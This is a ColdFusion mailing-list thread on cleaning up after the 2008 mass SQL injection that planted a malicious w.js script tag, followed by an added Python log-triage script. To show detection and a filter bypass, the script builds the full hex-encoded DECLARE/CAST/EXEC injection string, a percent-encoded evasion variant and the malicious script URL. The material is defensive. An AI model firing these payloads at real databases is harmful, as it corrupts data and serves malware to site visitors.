Hi Dave,
I have an older CF auction application that is being hit with this attack. I'm
running URLScan on my Win2k server running CF5 server w/ SQL2k. What is the max
length of URL you would recommend? Any deny verbs, headers, etc. you would
recommend so I can compare to my urlscan.ini? I added the script below, posted
on this list, to my application.cfm, but I think it might need to go into the
aps-global.cfm...
>>Even easier than monkeying with every single one of your cfquerys....
>just add the following line to the TOP of all your application.cfm's:
><cfif cgi.SCRIPT_NAME contains "EXEC(" OR cgi.PATH_INFO contains "EXEC("
>OR cgi.QUERY_STRING contains "EXEC("><cfabort></cfif>
Thanks,
Martin
>> The hacker's hope is that you will be outputting one of those
>
>For what it's worth, the specific URL that was injected in the sample I saw
>(http://1.verynx.cn/w.js) doesn't seem to work anymore. The server name
>doesn't resolve.
>
>Second, if you can restore a previous copy of the database, that might be
>easier.
>
>Also, I'd recommend that you identify the problem scripts that contain the
>vulnerability before you restore the database. Otherwise, you might have to
>repeat the process.
>
>Finally, you might consider implementing filtering at the web server to
>block long (and presumably problematic) URLs before they're even sent to CF.
>If you're using IIS, you can do that with the latest version of URLScan. If
>you're using Apache, I think mod_security will let you do this.
>
>Dave Watts, CTO, Fig Leaf Software
>http://www.figleaf.com/
>
>Fig Leaf Software provides the highest caliber vendor-authorized
>instruction at our training centers in Washington DC, Atlanta,
>Chicago, Baltimore, Northern Virginia, or on-site at your location.
>Visit http://training.figleaf.com/ for more information!
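Dave's advice above (find the scripts that carry the vulnerability before restoring the database) and the quoted "EXEC(" check both depend on what the injected request actually looks like in the web-server log. The script below is an added example, not code from the thread or from either poster. It triages constructed IIS W3C log lines, decodes the hex-wrapped payload so you can read the SQL that ran, reports which .cfm script and parameter were hit, and shows that a substring test on the raw query string misses a percent-encoded "EXEC%28". Two assumptions go beyond what the thread states: the request shape (a ";DECLARE @S ...;SET @S=CAST(0x... AS VARCHAR(4000));EXEC(@S);--" tail, as used by the 2008 mass-injection campaigns that delivered w.js) and that ColdFusion's cgi.QUERY_STRING is the undecoded string while the url scope, and so the cfquery, sees the decoded value. The table, column, script names, IPs and the log field order are invented for the example.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# --- Constructed sample data (not from the thread) -------------------------------
# Assumption: the request shape follows the 2008 mass SQL injection worms, which hid an
# UPDATE statement as a hex literal inside CAST(...) and ran it with EXEC(). The table,
# column, script names and IPs below are invented for the example.
PAYLOAD_SQL = "UPDATE items SET descr=descr+'<script src=http://1.verynx.cn/w.js></script>'"
PAYLOAD_HEX = "0x" + PAYLOAD_SQL.encode("ascii").hex().upper()


def worm_suffix(hex_blob, encode_parens=False):
    """Query-string tail appended to a numeric parameter; spaces arrive %20-encoded."""
    tail = f";DECLARE @S VARCHAR(4000);SET @S=CAST({hex_blob} AS VARCHAR(4000));EXEC(@S);--"
    tail = tail.replace(" ", "%20")
    if encode_parens:  # variant that hides the literal "EXEC(" from a raw-string check
        tail = tail.replace("(", "%28").replace(")", "%29")
    return tail


# Constructed IIS W3C log lines: one clean request, one injection with a literal "EXEC(",
# one with the parentheses percent-encoded, and one benign query containing "exec".
FIELDS = "date time cs-method cs-uri-stem cs-uri-query c-ip sc-status".split()
SAMPLE_LOG = [
    "2008-05-01 10:00:01 GET /item.cfm id=123 10.0.0.5 200",
    "2008-05-01 10:00:02 GET /item.cfm id=123" + worm_suffix(PAYLOAD_HEX) + " 198.51.100.7 200",
    "2008-05-01 10:00:03 GET /search.cfm cat=5" + worm_suffix(PAYLOAD_HEX, True) + " 198.51.100.7 200",
    "2008-05-01 10:00:04 GET /search.cfm q=executive%20desk 10.0.0.9 200",
]

# --- Detection -------------------------------------------------------------------
MARKERS = re.compile(r"\b(DECLARE\s+@|EXEC(UTE)?\s*\(|CAST\s*\(\s*0x)", re.IGNORECASE)
HEX_CAST = re.compile(r"CAST\s*\(\s*0x([0-9A-Fa-f]+)\s+AS\s+N?VARCHAR", re.IGNORECASE)
SCRIPT_SRC = re.compile(r"<script\s+src=([^\s>]+)", re.IGNORECASE)


def naive_raw_check(raw_query):
    """The thread's CFML idea transliterated: case-insensitive substring test on the RAW
    query string. Assumption: cgi.QUERY_STRING is not URL-decoded, so "EXEC%28" slips by."""
    return "EXEC(" in raw_query.upper()


def decode_hex_payload(decoded_query):
    """Turn CAST(0x... AS VARCHAR) back into the SQL the attacker actually ran."""
    m = HEX_CAST.search(decoded_query)
    if not m:
        return None
    return bytes.fromhex(m.group(1)).decode("latin-1")


def analyze(line):
    """Return a finding dict for an injected request, or None for a clean one."""
    rec = dict(zip(FIELDS, line.split(" ")))
    raw = rec["cs-uri-query"]
    decoded = unquote_plus(raw)  # what CF's url scope (and thus the cfquery) sees
    if not MARKERS.search(decoded):
        return None
    # The injected parameter is the one whose value carries the statement separator.
    param = next((kv.split("=", 1)[0] for kv in decoded.split("&") if ";" in kv), "?")
    payload = decode_hex_payload(decoded)
    src = SCRIPT_SRC.search(payload) if payload else None
    return {
        "script": rec["cs-uri-stem"],
        "param": param,
        "client": rec["c-ip"],
        "payload": payload,
        "script_src": src.group(1) if src else None,
        "caught_by_raw_exec_check": naive_raw_check(raw),
    }


def triage(lines):
    """Group findings by vulnerable script so each one can be fixed before the restore."""
    hits = defaultdict(list)
    for line in lines:
        finding = analyze(line)
        if finding:
            hits[finding["script"]].append(finding)
    return dict(hits)


if __name__ == "__main__":
    for script, findings in sorted(triage(SAMPLE_LOG).items()):
        for f in findings:
            print(f"{script} param={f['param']} from={f['client']} "
                  f"raw_check={f['caught_by_raw_exec_check']} src={f['script_src']}")
            print("   decoded:", f["payload"])
```

Running it against a real IIS log means reading the `#Fields:` header instead of the hard-coded FIELDS list, but the per-script grouping is the point: each script and parameter it names is one place where a `#url.x#` reaches a cfquery unparameterized, and that is where cfqueryparam (or equivalent typing of the value) has to go before the database is restored. A URLScan length cap or a deny string on "EXEC(" only blocks this particular campaign's shape; the percent-encoded line above already gets past the raw-string check.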
Archive:
http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309543